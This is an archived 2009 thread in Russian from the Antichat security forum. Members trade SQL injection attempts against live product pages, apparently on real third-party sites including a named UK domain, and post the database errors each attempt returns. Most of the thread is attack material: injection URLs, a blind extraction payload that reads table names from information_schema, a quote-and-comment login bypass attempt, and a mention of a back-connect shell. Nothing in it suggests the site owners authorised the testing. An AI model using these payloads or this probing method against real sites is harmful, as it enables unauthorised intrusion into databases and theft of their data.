ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
28.09.2009, 17:15
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
Сообщение от HAXTA4OK
Такс вопрос
при '
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
/prod-detail.asp, line 26
вопрос как реализовывать дальше =\ копать как MSSQL? or MySQL?
Я бы покопал в сторону Mysql
(хотя ошибка многое говорит (как ты уже знаешь если такая ошибка то значит не правильно работаем с Mysql))
Последний раз редактировалось wolmer; 28.09.2009 в 17:18..
|
|
|
28.09.2009, 17:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
MySQL говориш
http://wk/prod-detail.asp?ProductID=4429+and+b=system_user()
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]Unknown column 'b' in 'where clause' /prod-detail.asp, line 26
http://wk/prod-detail.asp?ProductID=4429+and+b=@@system_user
Microsoft OLE DB Provider for ODBC Drivers error '80040e31' [MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]Unknown system variable 'system_user' /prod-detail.asp, line 26
|
|
|
|
28.09.2009, 17:34
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Знаешь, не везде есть такие вещи.
Например @@basedir не везде работает.
Где то почему то поразному.
|
|
|
|
28.09.2009, 17:42
|
|
Участник форума
Регистрация: 03.09.2009
Сообщений: 179
Провел на форуме:
1014907
Репутация:
90
|
|
Сообщение от mailbrush
Как выяснилось, он проверяет еще и мыло. Я зарегался с мылом test@domain.com, паролем password. При вводе
Код:
test@domain.com
password
авторизация успешна, но при вводе
Код:
test@domain.com'#
password
пишет, что пароль неверный.. Значит никак не обойти? там может быть двойные кавычки, ещё можно иньекцию на пароле проверить
|
|
|
|
28.09.2009, 17:55
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
HAXTA4OK, выведи version() и верь тому что там написано.
З.Ы.
А вообще это MySQL
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 28.09.2009 в 18:12..
|
|
|
|
28.09.2009, 18:49
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
пилин понять не могу 
почему тогда пишет
http://wk/prod-detail.asp?ProductID=4429+and+id1
Microsoft OLE DB Provider for ODBC Drivers error '80040e31' [MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]The used SELECT statements have a different number of columns /prod-detail.asp, line 26
а при http://wk/prod-detail.asp?ProductID=4429+and+id
все нормально страница грузится
ЗЫ mySQL нашел другую просто и провел ее..но все равно в задумках 
Последний раз редактировалось HAXTA4OK; 28.09.2009 в 18:59..
|
|
|
|
28.09.2009, 19:40
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
HAXTA4OK, давай ссылку. Для телепатии недостаточно маны
http://www.edu-play.co.uk/prod-detail.asp?ProductID=4204+and+1=if(ascii(substring ((select+table_name+from+information_schema.tables +limit+0,1),1,1))>1,1,0)
Оно ?
|
|
|
|
28.09.2009, 20:01
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
не оно, SQL-inj нашел другую ..так что =) всем спс {/offtop]
|
|
|
|
28.09.2009, 20:33
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Update - вопрос остался без ответа 
Бэкконект, как вариант (если я правильно тебя понял)...
Ну не, это немного нето. Небудуж я его каждый раз запускать, палево млин. Мож кто нает как например разрешить конект на определенный порт? ибо например когда пингую говорит что сервер офф а из веба его видно. |
|
|
|
28.09.2009, 21:22
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
warlok, iptables -L
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
